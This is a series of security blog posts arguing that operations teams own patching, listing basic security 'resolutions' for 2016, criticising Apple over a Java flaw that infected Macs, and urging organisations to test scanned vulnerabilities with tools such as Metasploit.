Who is responsible for patching?

Midweek rant.

How many times have conversations along the lines of;

‘we are waiting for security to tell us what to patch’

occurred?

Why do teams responsible for running and maintaining systems persist in making patching a security issue?

I would challenge this and go as far as to say it is fundamentally wrong.

Patching / maintenance / updating systems must been seen as a core part of running a solution.

No solution should ever be deployed into a production environment without a clear ownership and agreed processes for maintaining it.

The role of the security team should be to provide assurance that the environment is being patched etc. according to the agreed processes.

Simple.

This would change your weekly / monthly patching / vulnerability management meetings from ‘here are all the patches that are past due and must be applied’ to ‘great job guys, 90% of patches applied lets discuss the few outliers’.

Also what happens with all the non security patches in these environments? Are they ever applied? how are systems kept up to date?

So – Maintain you systems. Patch them.  Keep them up to date. Let security provide assurance that this is happening.  Simple.

This approach also allows people to spend a lot more time working on the hard security problems rather than spending half their life talking about why patching has not happened!

A slightly blunt one, but I strongly believe this move in responsibility and accountability must occur if the patching crisis is ever to be resolved.

The next post will be back to the range of topics I have been discussing recently.

K

 

2016 Resolutions. The detail..

As promised, this follow up post will outline what I mean by each of the ‘resolutions’ I highlighted.

These were;

  1. Patch.  Everything.  On time.
  2. Protect your hosts.  Do application whitelisting.
  3. No admin rights for anyone who can access production data.
    1. No one with admin rights can access data.
  4. Role Based Access.
  5. Segregate your networks.
  6. If you create code, do solid code assurance.
  7. Test and Audit.

 

1. Patch.  Everything.  On time.

Sounds simple right?  It should be, but it seems it isn’t in many companies.  From my experience there seem to be 2 main drivers for so many companies failing this most basic of maintenance tasks;

  • Systems that must have almost 100% uptime, with no, or ill defined patching windows and processes.  This goes hand in hand with these solutions being incorrectly designed, if a system must always be ‘up’, design it in such a way that components can be taken out of service to be patched and maintained (or indeed if they fail).
  • Incorrect ownership and drivers for the patching process.  In many organisations it seems to be the security team who drive the need to apply ‘security’ patches.  This needs to be turned around.  Any system in production must be patched and maintained as part of BAU.  Systems / solutions should never be handed over into production without clear ownership and agreed processes for maintaining them, this must include patching.  Security then become an assurance function for this and their scans / checks confirm that the process is being correctly followed, plus of course highlighting any gaps.

If you see these issues in your organisation, make 2016 the year you address them, don’t be the next business in the headlines that is hacked due to systems that have not been patched for months!

2. Protect your hosts. Do application whitelisting.

With the ever more porous nature of our networks and perimeters, coupled with the insider threat and phishing etc. protecting our hosts is becoming ever more critical.

AV (Anti Virus / Malware) is not dead, but it also clearly is not enough on it’s own.  Indeed you will struggle to find any host protection product that only does AV these days.  Ensure all your hosts, both servers and user end points are running a solid, up to date and centrally managed host protection solution (or solutions) providing anti malware, host IPS (Intrusion Prevention System), host fire-walling and ideally FIM (File Integrity Monitoring).

I’m gradually trying to change peoples language from AV / Anti Malware to Host Protection as I think this covers both the requirement, and many of the solutions far better.

In addition to this I would strongly recommend the use of an application whitelisting solution, as this can provide a key defence in preventing any unapproved (or malicious) software from running.  As well as preventing malware, these solutions have the added benefit of helping to maintain a known environment, running only known and approved software.

3. No admin rights for anyone who can access production data.  No one with admin rights can access data.

This is something I am currently championing as a great way to reduce the risk to your organisations data.

This may be harder for very small organisations, but for medium and larger ones, think about the different roles your teams have.

How many people who need to access key data, e.g. via production applications, need to have administrative rights on their end user systems, or on the production systems?

Conversely, how many of the system administrators who maintain systems and databases etc. need access to the actual production data in order to perform their duties?

One of the most common ways malware gets a hold is via users with administrative privileges.  So if we prevent any user with these elevated privileges from having access to data, if they or their systems are compromised, the risk of data loss or of damage to data integrity is massively reduced.

While it may seem a substantial challenge to prevent administrators from having access to data, there are at least a couple of obvious options.

Some host protection solutions claim to have separation of duties capabilities that control who can access data outside of just relying on O/S (Operating System) permissions.  I have not tested these though.

Various companies offer transparent encryption solutions that have their own set of ACLs managed independently from the O/S permissions.  These can be managed by for example the security team to ensure only approved business users can access data, while still permitting administrators to perform their role.

4. Role Based Access.

This one should hopefully require minimal explanation.  Each type of user should have a defined role.  This should have associated system permissions allowing them to access data and perform the tasks required to perform their role.

This ensures people should only be able to access data they are supposed to, and not data they should not.  The principle of ‘least privilege’ must be adhered to when creating roles and applying permissions to ensure everyone can perform their duties, but not carry out tasks outside of those that are approved.

This can be backed up by using some form of IAM (Identity and Access Management) solution.  Although be careful about over complicating this if your organisation is not large enough and complex enough to warrant a cumbersome IAM solution.

5. Segregate your networks.

In addition to external firewalls preventing access from outside your organisation, internal networks must be segregated as well.

When designing your networks, think carefully about which systems need to to talk to each other, and on which ports.

For example, do your end user systems all need to access all of the production environments?  Or do some of your teams need access to some production systems and only on specific application ports?

This point can be linked with the host protection one above as host firewalls can be used to further prevent unauthorised access to systems.  Most servers do not need to connect to all other servers in the same zone as them.  Host firewalls can be used to restrict servers from connecting to other servers they do not need to, without requiring an overly complex network design.

Strong network and system segregation will help prevent the spread of any malware or malicious users within the organisations’ IT estate, and thus help ensure data is not removed or changed.

6. If you create code, do solid code assurance.

The OWASP top 10 has changed little for several years (look it up if you are not familiar).  Applications consistently have known and well understood vulnerabilities.  These same vulnerabilities are consistently exploited by malicious people.

If you create applications ensure the code goes through rigorous manual and automated code reviews.  Ensure the application is thoroughly tested against not just the businesses functional requirements, but also the non functional requirements from the security team.

Finally, before the application or substantial change goes live ensure it is penetration / security tested by experts.

Performing all these checks does not guarantee your application cannot be hacked, but it will ensure that it is not an easy target.  Ideally these steps should be key and non negotiable parts of your organisations SDLC (Software / System Development Life Cycle).

7. Test and Audit.

Once you have the basics in place, you need to ensure they are being successfully applied.  This is where the assurance part of the security teams role comes into play.  Whether it is supporting the SDLC processes or scanning systems for outstanding patches, the security team can, and must, assure that the agreed tasks and processes are being adhered to.

This step is critical to the ongoing success of the previous items, the effort and expertise required to complete it should not be under estimated.

 

Hopefully this has supplied some clarity and context to my previous post and made my intent clear.  Let me know.

In some following posts I’ll start talking about some of the really fun and intelligent things you can start doing once the basics are in place!

K

2016 Security Resolutions

It’s that time of year again, everyone will be writing their resolutions and predictions for the year.

Will we have more of the same?  More APTs?  More nation state sponsored breaches?  DDoS?  Increased application attacks?  More mobile malware?

Probably.

We all know there will be hackers, criminals, hactivists, malicious insiders, nation state actors etc.  We also all know there will be application attacks, malware, APTs, DDoS etc.

Rather than write another predictions article I thought I’d try a slightly different tack an cover the key things I think every organisation MUST do if they are not already.

  1. Patch.  Everything.  On time.
  2. Protect your hosts.  Do application whitelisting.
  3. No admin rights for anyone who can access production data.
    1. No one with admin rights can access data.
  4. Role Based Access.
  5. Segregate your networks.
  6. If you create code, do solid code assurance.
  7. Test and Audit.

Get the basics right!  There are of course many other things to focus on, but hopefully the general idea is clear.  Organisations need to be mindful of throwing too much time and money into the latest and greatest APT protection, behavioural analysis, and overcomplicated solutions to simple problems.  Getting the basics right must be the first priority.

Remember, it is extremely likely that attackers will go after the low hanging fruit.  Even if they are  directly targeting your organisation, it is un-patched systems, people with admin rights and unprotected hosts or applications that will be attacked first.  Only after these avenues have failed will they resort to more challenging and advanced attacks.

I’ll use a follow up post to cover the above point in more detail, but wanted to get these initial thoughts up.

What do you think?  How is your organisation doing with the basics?  Do you spend too much time on new, sexy security when you don’t have the basics covered?

Happy new year all!

K

 

 

Malware everywhere, even on Apples..

Various sources have been reporting on the recent Java hole that enabled malicious individuals to infect upwards of 600,000 Apple Macs that were running the latest, fully patched version of the O/S.

This Java vulnerability was actually known about sometime last year and has been patched on other systems.  Apple in it’s continued, and frankly misguided, belief that it’s systems are safe and don’t need protection like anti-virus software chose not to patch the hole until 100s of thousands of it’s customers had been infected.

The reality is that all consumer computer systems have vulnerabilities and it should be the expected duty of vendors to patch these as quickly as possible to protect their customers and their privacy.

We have all knocked companies like Microsoft for the amount of vulnerabilities and attacks that have occurred against their software, but the reality is that over the last few years Microsoft has made huge progress in producing more secure software, patching in a very timely manner, providing free tools like anti-virus, and working with law enforcement to bring down criminal bot nets.

Apple has avoided many exploits being created as it has historically been such a niche player.  Why create an exploit for a few machines when you can create one for orders of magnitude more?  As Apple has become more successful and there has been an increased uptake of it’s products in office it has become a more interesting and valuable target for criminals to try and exploit any vulnerabilities.

It is time for Apple to pull it’s socks up from a security stand point, and to become both more proactive and transparent in how it deals with issues and helps protect it’s customers.

For us users of any operating system it’s yet another reminder that we should keep our systems patched and run software to protect us from viruses etc.  Oh and not to trust vendors when then tell us their systems are safe and don’t need further protection.

Some detail and commentary on this issue can be found here at the links below;

http://nakedsecurity.sophos.com/2012/04/04/apple-patches-java-hole-that-was-being-used-to-compromise-mac-users/?utm_source=Naked+Security+-+Sophos+List&utm_medium=email&utm_campaign=a6d16b7680-naked%252Bsecurity

http://news.cnet.com/8301-13579_3-57410476-37/apples-security-code-of-silence-a-big-problem/?part=rss&subj=news&tag=2547-1_3-0-20&tag=nl.e703

K

Exploit vulnerabilities rather than just report on ‘hypothetical’ issues

While doing some general reading recently I came across an article entitled “Why aren’t you using Metasploit to expose Windows vulnerabilities?”.  This reminded me of something I have discussed with people a few times, the benefits of actually proving and demonstrating how vulnerabilities can be exploited rather than just relying on metrics from scanners..

Don’t get me wrong, the use of vulnerability / patch scanners are incredibly useful for providing an overall view of the status of an environment;

– Are patches being deployed consistently across the environment in a timely manner?

– Are rules around password complexity, who is in the administrators group, machines and users are located in the correct places in the LDAP database etc. being obeyed?

– Are software and O/S versions and types in line with the requirements / tech stack?

– etc..

The output from these scanners is also useful and extensively used in providing compliance / regulatory type report data confirming that an environment is ‘correctly’ maintained.

What these scans fall short in two main areas;

1. They do not provide a real picture of the actual risk any of the identified vulnerabilities pose to your organisation in your configuration with your polices and rules applied.

2. Due to point 1 they may either not create enough realisation of the risks for senior management to put enough priority / emphasis on remediating them, or they may cause far too much fear due to the many vulnerabilities identified that may or may not be exploitable.

In order to provide a quantitate demonstration of how easy (or difficult) it is to exploit identified vulnerabilities, and also demonstrate to management how these reported vulnerabilities actually be exploited, using tools such as Core Impact, Canvas or Metasploit in addition to just scanning for vulnerabilities is key.

Tools like Canvas and Core Impact are commercial offerings with relatively high price tags, Metasploit is however open source and free to use in both Windows and *nix environments. It even has a gui!  So there is no excuse for not actually testing some key vulnerabilities identified by your scans, then demonstrating the results to senior management and even other IT staff to increase awareness.

Metasploit can be found here;

http://www.metasploit.com/

Where it can be downloaded for free.  Should you wish to contribute to it’s success there are also paid for versions.

The key message here is don’t stop using the standard patch / vulnerability scans as these are key to providing a picture of the entire environment and providing assurance of compliance to policies.  However these should be supplemented with actually exploiting some key vulnerabilities to provide evidence of the actual risk in you environment rather than just the usual ‘arbitrary code execution’ or similar statement related to the potential vulnerability.  This will put much more weight behind the your arguments for improving security.

K